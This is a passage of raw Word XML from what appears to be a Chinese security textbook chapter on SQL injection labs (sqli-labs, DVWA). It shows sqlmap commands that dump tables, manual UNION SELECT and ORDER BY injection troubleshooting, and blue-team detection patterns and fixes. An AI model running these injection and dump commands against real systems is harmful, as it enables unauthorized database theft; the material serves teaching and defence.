      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 示例：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># sqlmap -u "http://&lt;TARGET_IP&gt;/sqli-labs/Less-1/?id=1" -D security --tables</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># sqlmap -u "http://&lt;TARGET_IP&gt;/sqli-labs/Less-1/?id=1" -D security -T users --columns</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># sqlmap -u "http://&lt;TARGET_IP&gt;/sqli-labs/Less-1/?id=1" -D security -T users --dump</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 注意：sqlmap 的 --dump 会直接输出数据库内容，包括密码哈希等。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 此操作用于理解攻击自动化的能力，实际渗透测试中需书面授权。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[工具使用说明]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是一个成熟的开源工具，但它的自动化请求模式会产生大量探测流量，极易触发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IDS。在授权渗透测试中合理使用，在非授权环境使用属于违法行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">③ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">手工注入中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT user,database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会在原页面数据回显的地方额外输出数据库用户名和当前库名——例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">页面在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> First name/Surname </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">两列分别显示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">root@localhost</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dvwa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（实际输出因环境而异），证明注入成功且当前数据库用户权限较高。sqlmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--dbs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会以表格形式列出所有可访问的数据库，例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] dvwa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等。注意：不要在教材中编造具体的数据库名或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">值——一切以读者自己实验环境中的实际输出为准。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">④ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见报错与排错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报错信息/现象</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">解决方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">The used SELECT statements have a different number of columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">联合查询列数不匹配</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">重新用</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ORDER BY n</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">确认列数，确保</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">UNION SELECT</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">后的列数正确</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">注入</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> payload </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">导致语法错误，但无具体报错回显</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">应用开启了统一错误页或</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> display_errors=Off</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">切换至</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 9.2 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">节盲注技术，或检查服务器错误日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">注释符不生效，SQL</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">语句仍然报错</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">数据库要求</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">后必须有空格（或</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> URL </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">编码中的</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">），且不同数据库注释符不同（MySQL</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">支持</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">，SQL</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Server </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">用</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">，Oracle</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">用</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">使用</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">（含空格）或</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">（URL</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">编码空格），或改用对应数据库的注释符</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">UNION SELECT</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">正常但页面无额外回显</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">原查询结果数量覆盖了联合结果；或仅第一列回显有效</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">在原查询参数上使用</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">id=-1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">或无效值使原查询返回空行；或交换</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> payload </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">位置试探回显列</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">WAF </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">拦截（如</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 403 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Forbidden）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">请求中含</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">UNION SELECT</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">information_schema</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">等特征字符串被</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> WAF </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">规则阻断</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">参见</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 9.3 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">节纵深防御中关于</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> WAF </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">绕过的概念讨论；在授权实验环境中可关闭</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> WAF </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">或降低规则级别以完成基础学习</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[防御对照框（强制）]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">数据库审计日志异常检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：开启数据库原生日志（MySQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> General Log/PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">log_statement），监控异常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式——包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关键字的查询、高频出现的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询、多层次的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">遍历尝试。可编写</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则检测连续递增的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">探测序列，这是手工注入的强特征。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">WAF/IDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：部署</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WAF（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ModSecurity + OWASP Core Rule </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Set），SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入规则集会检测标准注入关键字和异常字符序列。注意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是纵深防御的一层而非根治手段（存在绕过可能，详见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AdvSQLi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等研究对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF-as-a-service </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的绕过评估），不得替代代码修复。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">应用日志关联</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在高频访问单一参数、低时间间隔、并伴随大量数据库错误的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求模式，应触发告警。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">修复（根治措施）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">参数化查询/预编译语句（根治）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用参数化查询（Parameterized</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
